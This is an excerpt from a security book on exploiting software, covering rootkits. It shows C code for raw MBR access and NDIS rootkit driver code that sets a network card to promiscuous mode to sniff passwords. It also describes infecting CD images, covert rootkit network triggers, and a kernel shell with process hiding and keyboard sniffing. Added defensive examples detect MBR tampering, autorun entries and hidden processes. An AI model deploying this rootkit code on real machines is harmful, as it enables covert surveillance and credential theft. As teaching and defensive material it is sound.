
Exploiting Software: How to Break Code
By Greg Hoglund, Gary McGraw
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512

How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.

Exploiting Software is loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.

This must-have book may shock you—and it will certainly educate you. Getting beyond the script kiddie treatment found in many hacking books, you will learn about:

Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits

Exploiting Software is filled with the tools, concepts, and knowledge necessary to break software.

Low-Level Disk Access

Another traditional method of storing viruses has been on boot blocks, floppy disks, and hard drives. Interestingly enough, these techniques still work today and it's quite simple to access the boot block of a drive. The following code illustrates a simple method to read and write from the master boot record on an NT system.

Reading/Writing the Master Boot Record (MBR)

To obtain access to the MBR you must have raw read/write access to the physical drive itself. Using a simple call to CreateFile and the proper object name, you can open any of the drives on a system. The following code shows how to open a handle to the first physical drive and subsequently read the first 512 bytes of data from it. This block of data contains the contents of the first drive sector, otherwise known as the MBR.

    char   mbr_data[512];
    DWORD  dwBytesRead;

    /* "\\.\physicaldrive0" is the raw device object for the first physical
       disk; opening it for raw access requires administrative privileges. */
    HANDLE hDriver = CreateFile("\\\\.\\physicaldrive0",
                                GENERIC_READ | GENERIC_WRITE,
                                FILE_SHARE_READ | FILE_SHARE_WRITE,
                                0,
                                OPEN_EXISTING,
                                0,
                                0);
    if (hDriver != INVALID_HANDLE_VALUE) {
        /* sector 0 is the MBR: 446 bytes of boot code, the 64-byte
           partition table, and the 0x55AA boot signature */
        ReadFile( hDriver, mbr_data, 512, &dwBytesRead, NULL );
        CloseHandle( hDriver );
    }
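A defender who reads the same 512 bytes wants to know what is in them and whether they have changed since a known-good baseline. The following is an added example, not code from the book or from the rootkit.com sources: it parses the sector's partition table and boot signature and hashes the boot-code region (bytes 0 to 445) so that a later read can be compared against a stored hash. The sample sector is constructed inline; in practice the bytes would come from the ReadFile call above, and the function names (parse_mbr, bootcode_changed, build_sample_mbr) are this example's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MBR_SIZE        512
#define PART_TABLE_OFF  446   /* boot code occupies bytes 0..445 */
#define PART_ENTRY_SIZE 16
#define BOOT_SIG_OFF    510   /* 0x55 0xAA */

typedef struct {
    uint8_t  bootable;       /* 0x80 = active partition */
    uint8_t  type;           /* partition type id, e.g. 0x07 */
    uint32_t lba_start;      /* first sector, stored little-endian on disk */
    uint32_t sector_count;
} mbr_partition;

typedef struct {
    int           valid_signature;
    mbr_partition part[4];
    uint32_t      bootcode_hash; /* FNV-1a over the boot code region */
} mbr_info;

static uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* 32-bit FNV-1a: enough to notice any byte changing in the region it covers. */
uint32_t fnv1a32(const uint8_t *data, size_t len) {
    uint32_t h = 2166136261u;
    for (size_t i = 0; i < len; i++) {
        h ^= data[i];
        h *= 16777619u;
    }
    return h;
}

/* Parse one raw sector. Returns 0 on success, -1 if the boot signature is
   missing (the partition table is still filled in so the caller can inspect it). */
int parse_mbr(const uint8_t sector[MBR_SIZE], mbr_info *out) {
    memset(out, 0, sizeof(*out));
    out->valid_signature = (sector[BOOT_SIG_OFF] == 0x55 &&
                            sector[BOOT_SIG_OFF + 1] == 0xAA);
    out->bootcode_hash = fnv1a32(sector, PART_TABLE_OFF);
    for (int i = 0; i < 4; i++) {
        const uint8_t *e = sector + PART_TABLE_OFF + i * PART_ENTRY_SIZE;
        out->part[i].bootable     = e[0];
        out->part[i].type         = e[4];
        out->part[i].lba_start    = read_le32(e + 8);
        out->part[i].sector_count = read_le32(e + 12);
    }
    return out->valid_signature ? 0 : -1;
}

/* Returns 1 if the boot code region differs from the stored baseline hash, else 0.
   A boot-sector virus that replaces the MBR loader changes exactly this region. */
int bootcode_changed(const uint8_t sector[MBR_SIZE], uint32_t baseline_hash) {
    return fnv1a32(sector, PART_TABLE_OFF) != baseline_hash;
}

/* Constructed sample sector (not a real disk image): a stub loader, one active
   NTFS partition starting at LBA 2048 with 204800 sectors, and a valid signature. */
void build_sample_mbr(uint8_t sector[MBR_SIZE]) {
    uint8_t *e = sector + PART_TABLE_OFF;
    memset(sector, 0, MBR_SIZE);
    sector[0] = 0xEB; sector[1] = 0x3C; sector[2] = 0x90;   /* jmp short; nop */
    for (int i = 3; i < 64; i++) sector[i] = (uint8_t)(i * 7);
    e[0] = 0x80; e[4] = 0x07;
    e[8]  = 0x00; e[9]  = 0x08; e[10] = 0x00; e[11] = 0x00; /* 2048   = 0x00000800 */
    e[12] = 0x00; e[13] = 0x20; e[14] = 0x03; e[15] = 0x00; /* 204800 = 0x00032000 */
    sector[BOOT_SIG_OFF] = 0x55; sector[BOOT_SIG_OFF + 1] = 0xAA;
}

int main(void) {
    uint8_t  sector[MBR_SIZE];
    mbr_info info;
    uint32_t baseline;

    build_sample_mbr(sector);
    if (parse_mbr(sector, &info) != 0) { puts("no 0x55AA boot signature"); return 1; }
    baseline = info.bootcode_hash;   /* a real tool stores this at install time */
    printf("partition 0: type 0x%02x start %u count %u\n", info.part[0].type,
           (unsigned)info.part[0].lba_start, (unsigned)info.part[0].sector_count);

    sector[0x10] ^= 0xFF;            /* simulate one patched byte in the loader */
    printf("boot code changed: %d\n", bootcode_changed(sector, baseline));
    return 0;
}
```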

Infecting CD-ROM Images

CD-ROMs use the ISO9660 file system. These can be infected with virus programs in a similar way to floppy disks. A bootable CD can most certainly contain a virus that is activated on boot. Another trick is using the AUTORUN.INF file. The AUTORUN.INF file causes programs to be launched automatically when the CD is inserted. This feature is often on by default. Lastly, files on the CD can simply be infected using standard tricks. There is nothing stopping a virus or rootkit from accessing a CD-R drive and burning information to a mounted (writable) CD disk.[7]

[7] More on the idea of infecting CD images can be found in the 'zine 29A Labs, issue 6, "Infecting ISO CD Images" by ZOMBiE.
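The defensive check for the AUTORUN.INF trick is to look at what the file would launch before the disc is trusted. This added example (not code from the book) is a small parser for the [autorun] section: it honours the format's case-insensitive section and key names, CRLF line endings and ';' comments, ignores keys outside [autorun], and reports whether an open= or shellexecute= entry exists. The sample file is constructed for the example, and parse_autorun and autorun_info are names chosen here.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define VAL_MAX 256

typedef struct {
    char open[VAL_MAX];          /* open=        : program run when the disc is inserted */
    char shellexecute[VAL_MAX];  /* shellexecute=: target handed to ShellExecute */
    char icon[VAL_MAX];          /* icon=        : cosmetic, but often names the same binary */
    int  launches_program;       /* 1 if open= or shellexecute= is present in [autorun] */
} autorun_info;

/* strip leading and trailing whitespace (including the CR of CRLF endings) in place */
static void trim(char *s) {
    size_t len = strlen(s);
    while (len > 0 && isspace((unsigned char)s[len - 1])) s[--len] = '\0';
    size_t start = 0;
    while (s[start] && isspace((unsigned char)s[start])) start++;
    if (start) memmove(s, s + start, len - start + 1);
}

/* case-insensitive equality: INI section and key names are not case sensitive */
static int ieq(const char *a, const char *b) {
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) return 0;
    return *a == '\0' && *b == '\0';
}

/* Parse AUTORUN.INF text. Only keys inside the [autorun] section count; comments
   and blank lines are skipped. Returns 1 if the file would launch a program, else 0. */
int parse_autorun(const char *text, autorun_info *out) {
    char line[512];
    int  in_autorun = 0;
    const char *p = text;

    memset(out, 0, sizeof(*out));
    while (*p) {
        size_t n = 0;
        while (*p && *p != '\n' && n < sizeof(line) - 1) line[n++] = *p++;
        while (*p && *p != '\n') p++;      /* discard the rest of an over-long line */
        if (*p == '\n') p++;
        line[n] = '\0';
        trim(line);
        if (line[0] == '\0' || line[0] == ';') continue;
        if (line[0] == '[') {               /* section header */
            char *end = strchr(line, ']');
            if (end) *end = '\0';
            trim(line + 1);
            in_autorun = ieq(line + 1, "autorun");
            continue;
        }
        if (!in_autorun) continue;
        char *eq = strchr(line, '=');
        if (!eq) continue;
        *eq = '\0';
        char *key = line, *val = eq + 1;
        trim(key); trim(val);
        if (ieq(key, "open"))              strncpy(out->open, val, VAL_MAX - 1);
        else if (ieq(key, "shellexecute")) strncpy(out->shellexecute, val, VAL_MAX - 1);
        else if (ieq(key, "icon"))         strncpy(out->icon, val, VAL_MAX - 1);
    }
    out->launches_program = (out->open[0] != '\0' || out->shellexecute[0] != '\0');
    return out->launches_program;
}

/* Constructed sample, not taken from real media. */
const char *SAMPLE_AUTORUN =
    "; constructed AUTORUN.INF for the example\r\n"
    "[AutoRun]\r\n"
    "icon = setup.exe,0\r\n"
    "open=setup.exe /s\r\n"
    "label=Product CD\r\n";

int main(void) {
    autorun_info a;
    if (parse_autorun(SAMPLE_AUTORUN, &a)) {
        if (a.open[0])         printf("insertion would run (open=):         %s\n", a.open);
        if (a.shellexecute[0]) printf("insertion would run (shellexecute=): %s\n", a.shellexecute);
    } else {
        puts("no program launched on insertion");
    }
    return 0;
}
```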


Adding Network Support to a Driver

Allowing a rootkit driver to talk to the network adds a final, but critical, touch, allowing the code to be accessed remotely. It is possible to embed a TCP/IP stack into a driver and open a remote shell. In fact, the popular kernel-mode debugger called SoftIce has this feature. The NTROOT rootkit distributed from www.rootkit.com has sample code that exposes a TCP/IP shell. Under Windows NT, an easy way to build network support is to use the NDIS library. Unfortunately, not many device driver books cover the subject of network device drivers. Thus, use of NDIS has not been well documented outside the DDK.

Using the NDIS Library

Microsoft supplies the NDIS library for network and protocol drivers to implement their own stack independent of the network card. We can use this library to build a stack and communicate with the network. This is one way that a rootkit driver can provide an interactive shell.

The first step in using NDIS is to register a set of callback functions for NDIS operations. The OnXXX values are pointers to callback functions.[8]

[8] Complete source for these examples can be obtained from http://www.rootkit.com.

    NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject,
                          IN PUNICODE_STRING theRegistryPath )
    {
        NDIS_PROTOCOL_CHARACTERISTICS aProtocolChar;
        UNICODE_STRING                aDriverName;
        /* aStatus, aNdisProtocolHandle, aProtoName, aErrorStatus, aMediumArray,
           anOpenP and aDeviceExtension are declared in parts of the NTROOT
           source that this excerpt leaves out. */

        /*
         * init network sniffer - this is all standard and
         * documented in the DDK.
         */
        RtlZeroMemory( &aProtocolChar, sizeof(NDIS_PROTOCOL_CHARACTERISTICS));
        aProtocolChar.MajorNdisVersion            = 3;
        aProtocolChar.MinorNdisVersion            = 0;
        aProtocolChar.Reserved                    = 0;
        aProtocolChar.OpenAdapterCompleteHandler  = OnOpenAdapterDone;
        aProtocolChar.CloseAdapterCompleteHandler = OnCloseAdapterDone;
        aProtocolChar.SendCompleteHandler         = OnSendDone;
        aProtocolChar.TransferDataCompleteHandler = OnTransferDataDone;
        aProtocolChar.ResetCompleteHandler        = OnResetDone;
        aProtocolChar.RequestCompleteHandler      = OnRequestDone;
        aProtocolChar.ReceiveHandler              = OnReceiveStub;
        aProtocolChar.ReceiveCompleteHandler      = OnReceiveDoneStub;
        aProtocolChar.StatusHandler               = OnStatus;
        aProtocolChar.StatusCompleteHandler       = OnStatusDone;
        aProtocolChar.Name                        = aProtoName;

        DbgPrint("ROOTKIT: Registering NDIS Protocol\n");
        NdisRegisterProtocol( &aStatus,
                              &aNdisProtocolHandle,
                              &aProtocolChar,
                              sizeof(NDIS_PROTOCOL_CHARACTERISTICS));
        if (aStatus != NDIS_STATUS_SUCCESS) {
            DbgPrint("DriverEntry: ERROR NdisRegisterProtocol failed\n");
            return aStatus;
        }

        aDriverName.Length        = 0;
        aDriverName.Buffer        = ExAllocatePool( PagedPool, MAX_PATH_LENGTH );
        aDriverName.MaximumLength = MAX_PATH_LENGTH;
        RtlZeroMemory(aDriverName.Buffer, MAX_PATH_LENGTH);

        /* _______________________________________________________________
         * get the name of the MAC-layer driver
         * and the name of the packet driver
         * HKLM/SYSTEM/CurrentControlSet/Services/TcpIp/Linkage ..
         * _______________________________________________________________ */
        if (ReadRegistry( &aDriverName ) != STATUS_SUCCESS) {
            goto RegistryError;   /* the label is in the elided part of the function */
        }
        ...
        NdisOpenAdapter(
            &aStatus,
            &aErrorStatus,
            &anOpenP->AdapterHandle,
            &aDeviceExtension->Medium,
            &aMediumArray,
            1,
            aDeviceExtension->NdisProtocolHandle,
            anOpenP,
            &aDeviceExtension->AdapterName,
            0,
            NULL);
        if (aStatus != NDIS_STATUS_PENDING)
        {
            /* completed synchronously: NDIS will not call our completion
               handler, so invoke it ourselves */
            OnOpenAdapterDone(
                anOpenP,
                aStatus,
                NDIS_STATUS_SUCCESS
            );
        }
        ...
    }

The first call is to NdisRegisterProtocol, which is how we register our callback functions. The second call is to ReadRegistry (explained later), which tells us the binding name for the network card. This information is used to initialize the device extension structure that is then used in a call to NdisOpenAdapter. If the call returns success, we must manually call OnOpenAdapterDone. If the call returns NDIS_STATUS_PENDING, this means that the OS is going to make a callback to OnOpenAdapterDone on our behalf.

Putting the Interface in Promiscuous Mode

When a network interface is in "promiscuous mode" it can sniff all packets that are physically delivered to the interface, regardless of target address. This is required if you want to see traffic that is destined for other machines on the network. We put the network interface card into promiscuous mode so the rootkit can sniff passwords and other communications channel information. This is performed in the OnOpenAdapterDone call. We use the NdisRequest function to set the interface into promiscuous mode:

    VOID
    OnOpenAdapterDone( IN NDIS_HANDLE ProtocolBindingContext,
                       IN NDIS_STATUS Status,
                       IN NDIS_STATUS OpenErrorStatus )
    {
        PIRP           Irp  = NULL;
        POPEN_INSTANCE Open = NULL;
        NDIS_REQUEST   anNdisRequest;
        NDIS_STATUS    anotherStatus;
        ULONG          aMode = NDIS_PACKET_TYPE_PROMISCUOUS;

        DbgPrint("ROOTKIT: OnOpenAdapterDone called\n");

        /* set card into promiscuous mode */
        if(gOpenInstance){
            //
            // Initializing the event
            //
            NdisInitializeEvent(&gOpenInstance->Event);

            /* setting OID_GEN_CURRENT_PACKET_FILTER to NDIS_PACKET_TYPE_PROMISCUOUS
               asks the miniport to indicate every frame it receives */
            anNdisRequest.RequestType = NdisRequestSetInformation;
            anNdisRequest.DATA.SET_INFORMATION.Oid = OID_GEN_CURRENT_PACKET_FILTER;
            anNdisRequest.DATA.SET_INFORMATION.InformationBuffer = &aMode;
            anNdisRequest.DATA.SET_INFORMATION.InformationBufferLength = sizeof(ULONG);

            NdisRequest( &anotherStatus,
                         gOpenInstance->AdapterHandle,
                         &anNdisRequest );
        }
        return;
    }

Finding the Correct Network Card

Windows stores information about network cards in the following registry key:

    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards

Under this key are a series of numbered subkeys. Each subkey represents a network card or interface. The subkey contains a very important value called ServiceName. This value is a string that contains the GUID, which must be used to open the adapter. The rootkit driver must obtain one of these GUID strings to open a binding to the adapter using NDIS.

The following code snippet obtains this GUID value for the first network interface listed[9]:

[9] Once again, all this code can be obtained from http://www.rootkit.com as part of the NTROOT rootkit driver.

    /* this is major work just to enum a subkey value */
    NTSTATUS
    EnumSubkeys(
        IN PWSTR theRegistryPath,
        IN PUNICODE_STRING theStringP
        )
    {
        //----------------------------------------------------
        // for opening parent key
        HANDLE            hKey;
        OBJECT_ATTRIBUTES oa;
        NTSTATUS          Status;
        UNICODE_STRING    ParentPath;

        // for enumerating a subkey
        KEY_BASIC_INFORMATION  Info;
        PKEY_BASIC_INFORMATION pInfo;
        ULONG                  ResultLength;
        ULONG                  Size;
        PWSTR                  Position;
        PWSTR                  FullName;

        // for value query
        RTL_QUERY_REGISTRY_TABLE aParamTable[2];
        //----------------------------------------------------

        DbgPrint("rootkit: entered EnumSubkeys()\n");
        __try
        {
            RtlInitUnicodeString(&ParentPath, theRegistryPath);

            /*
            ** First try opening this key
            */
            InitializeObjectAttributes(&oa,
                                       &ParentPath,
                                       OBJ_CASE_INSENSITIVE,
                                       NULL,
                                       (PSECURITY_DESCRIPTOR)NULL);
            Status = ZwOpenKey(&hKey,
                               KEY_READ,
                               &oa);
            if (!NT_SUCCESS(Status)) {
                return Status;
            }

            /*
            ** First find the length of the subkey data.
            ** (the buffer is deliberately too small; the call reports
            **  STATUS_BUFFER_OVERFLOW and the size that is actually needed)
            */
            Status = ZwEnumerateKey(hKey,
                                    0, /* index of zero */
                                    KeyBasicInformation,
                                    &Info,
                                    sizeof(Info),
                                    &ResultLength);
            if (Status == STATUS_NO_MORE_ENTRIES || NT_ERROR(Status)) {
                ZwClose(hKey);   /* close the key on every exit path */
                return Status;
            }
            Size = Info.NameLength + FIELD_OFFSET(KEY_BASIC_INFORMATION, Name[0]);
            pInfo = (PKEY_BASIC_INFORMATION) ExAllocatePool(PagedPool, Size);
            if (pInfo == NULL) {
                Status = STATUS_INSUFFICIENT_RESOURCES;
                ZwClose(hKey);
                return Status;
            }

            /*
            ** Now enumerate the first subkey.
            */
            Status = ZwEnumerateKey(hKey,
                                    0,
                                    KeyBasicInformation,
                                    pInfo,
                                    Size,
                                    &ResultLength);
            ZwClose(hKey);   /* the parent key is not needed past this point */
            if (!NT_SUCCESS(Status)) {
                ExFreePool((PVOID)pInfo);
                return Status;
            }
            if (Size != ResultLength) {
                ExFreePool((PVOID)pInfo);
                Status = STATUS_INTERNAL_ERROR;
                return Status;
            }

            /*
            ** Generate the fully expanded name and query values.
            */
            FullName = ExAllocatePool(PagedPool,
                                      ParentPath.Length +
                                      sizeof(WCHAR) +       // '\'
                                      pInfo->NameLength + sizeof(UNICODE_NULL));
            if (FullName == NULL) {
                ExFreePool((PVOID)pInfo);
                return STATUS_INSUFFICIENT_RESOURCES;
            }
            RtlCopyMemory((PVOID)FullName,
                          (PVOID)ParentPath.Buffer,
                          ParentPath.Length);
            Position = FullName + ParentPath.Length / sizeof(WCHAR);
            Position[0] = '\\';
            Position++;
            RtlCopyMemory((PVOID)Position,
                          (PVOID)pInfo->Name,
                          pInfo->NameLength);
            Position += pInfo->NameLength / sizeof(WCHAR);
            /*
            ** Null terminate.
            */
            Position[0] = UNICODE_NULL;
            ExFreePool((PVOID)pInfo);

            /*
            ** Get the value data for binding.
            **
            */
            RtlZeroMemory( &aParamTable[0], sizeof(aParamTable) );
            aParamTable[0].Flags = RTL_QUERY_REGISTRY_DIRECT |
                                   RTL_QUERY_REGISTRY_REQUIRED;
            aParamTable[0].Name = L"ServiceName";
            aParamTable[0].EntryContext = theStringP; /* will be allocated */

            // Because we are using required and direct,
            // we don't need to set in defaults.
            // IMPORTANT note, the last entry is ALL NULL,
            // required by call to know when it's done. Don't forget!
            Status=RtlQueryRegistryValues(
                       RTL_REGISTRY_ABSOLUTE | RTL_REGISTRY_OPTIONAL,
                       FullName,
                       &aParamTable[0],
                       NULL,
                       NULL );

            ExFreePool((PVOID)FullName);
            return(Status);
        }
        __except(EXCEPTION_EXECUTE_HANDLER)
        {
            DbgPrint("rootkit: Exception in EnumSubkeys(). Unknown error.\n");
        }
        return STATUS_UNSUCCESSFUL;
    }

    /* ___________________________________________________________________________
     . This code reads the registry to determine the name of the network interface
     . card. It grabs the first registered name, regardless of how many
     . are present. It would be better to bind to all of them, but for
     . simplicity we are only binding to the first.
     . ___________________________________________________________________________ */
    NTSTATUS ReadRegistry( IN PUNICODE_STRING theBindingName ) {
        NTSTATUS       aStatus;
        UNICODE_STRING aString;

        DbgPrint("ROOTKIT: ReadRegistry called\n");
        __try
        {
            aString.Length = 0;
            aString.Buffer = ExAllocatePool( PagedPool, MAX_PATH_LENGTH ); /* free me */
            if (aString.Buffer == NULL) {
                return STATUS_INSUFFICIENT_RESOURCES;
            }
            aString.MaximumLength = MAX_PATH_LENGTH;
            RtlZeroMemory(aString.Buffer, MAX_PATH_LENGTH);

            /* kernel-side path of HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards,
               the parent of the numbered per-adapter subkeys */
            aStatus = EnumSubkeys(
                          L"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkCards",
                          &aString );
            if(!NT_SUCCESS(aStatus)){
                DbgPrint("rootkit: RtlQueryRegistryValues failed Code = 0x%0x\n", aStatus);
            }
            else{
                /* the NDIS binding name is \Device\ followed by the ServiceName GUID */
                RtlAppendUnicodeToString(theBindingName, L"\\Device\\");
                RtlAppendUnicodeStringToString(theBindingName, &aString);
                ExFreePool(aString.Buffer);
                return aStatus; /* we're good */
            }
            ExFreePool(aString.Buffer);
            return aStatus; /* last error */
        }
        __except(EXCEPTION_EXECUTE_HANDLER)
        {
            DbgPrint("rootkit: Exception occurred in ReadRegistry(). Unknown error.\n");
        }
        return STATUS_UNSUCCESSFUL;
    }

Using Boron Tags for Security

One nice trick to use to prevent people from detecting the rootkit network interface is to require a certain source port or IP ID value before the rootkit will respond to a packet. This idea can be extended to any data in the packet, but the key is that some obscure knowledge is required before the rootkit will respond. Remember that a rootkit can be compiled and customized by anyone, thus the choice of obfuscation is left up to your imagination.

Adding an Interactive Shell

A rootkit can have a remote TCP/IP shell directly into the kernel. Here is an example of the menu provided by one of the rootkits at www.rootkit.com:

    Win2K Rootkit by the team rootkit.com
    Version 0.4 alpha
    ------------------------------------------
    command         description
    ps              show proclist
    help            this data
    buffertest      debug output
    hidedir         hide prefixed file/dir
    hideproc        hide prefixed processes
    debugint        (BSOD)fire int3
    sniffkeys       toggle keyboard sniffer
    echo <string>   echo the given string

    *(BSOD) means Blue Screen of Death
      if a kernel debugger is not present!
    *'prefixed' means the process or filename
      starts with the letters '_root_'.
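The hideproc and hidedir commands above work by filtering every name that starts with '_root_' out of the lists the system reports. The standard way to detect that kind of hiding is a cross-view diff: enumerate the same objects through two paths, one the rootkit hooks and one it does not, and compare. This added example (not code from the book or from rootkit.com) runs that comparison over constructed process-name lists; apply_prefix_filter only stands in for the hooked view so the demo is self-contained, and cross_view_diff and build_sample_views are names chosen here.

```c
#include <stdio.h>
#include <string.h>

#define MAX_NAMES 32
#define NAME_LEN  64

typedef struct {
    int  count;
    char name[MAX_NAMES][NAME_LEN];
} name_list;

static void list_add(name_list *l, const char *name) {
    if (l->count >= MAX_NAMES) return;
    strncpy(l->name[l->count], name, NAME_LEN - 1);
    l->name[l->count][NAME_LEN - 1] = '\0';
    l->count++;
}

static int list_contains(const name_list *l, const char *name) {
    for (int i = 0; i < l->count; i++)
        if (strcmp(l->name[i], name) == 0) return 1;
    return 0;
}

/* The hiding rule from the menu: names that start with the letters '_root_'. */
int has_root_prefix(const char *name) {
    return strncmp(name, "_root_", 6) == 0;
}

/* Stand-in for what a hooked enumeration API would return: the prefix filter
   applied to the true list. Used only to build the demo's high-level view. */
void apply_prefix_filter(const name_list *truth, name_list *filtered) {
    filtered->count = 0;
    for (int i = 0; i < truth->count; i++)
        if (!has_root_prefix(truth->name[i])) list_add(filtered, truth->name[i]);
}

/* Cross-view diff: anything present in the low-level view but missing from the
   high-level (hookable) view is being hidden. Returns the number of hidden entries
   and copies their names into *hidden. */
int cross_view_diff(const name_list *high_level, const name_list *low_level,
                    name_list *hidden) {
    hidden->count = 0;
    for (int i = 0; i < low_level->count; i++)
        if (!list_contains(high_level, low_level->name[i]))
            list_add(hidden, low_level->name[i]);
    return hidden->count;
}

/* Constructed sample process names for the demo, not taken from a real system. */
void build_sample_views(name_list *low_level, name_list *high_level) {
    static const char *procs[] = { "System", "smss.exe", "winlogon.exe",
                                   "_root_shell.exe", "explorer.exe" };
    low_level->count = 0;
    for (size_t i = 0; i < sizeof(procs) / sizeof(procs[0]); i++)
        list_add(low_level, procs[i]);
    apply_prefix_filter(low_level, high_level);   /* what the hooked API would show */
}

int main(void) {
    name_list low, high, hidden;
    build_sample_views(&low, &high);
    int n = cross_view_diff(&high, &low, &hidden);
    printf("%d hidden object(s)\n", n);
    for (int i = 0; i < n; i++) printf("  hidden: %s\n", hidden.name[i]);
    return 0;
}
```

On a live system the two views would come from different enumeration paths (for example a user-mode API versus a lower-level walk of the same objects), and any discrepancy, not only a '_root_' name, is the signal.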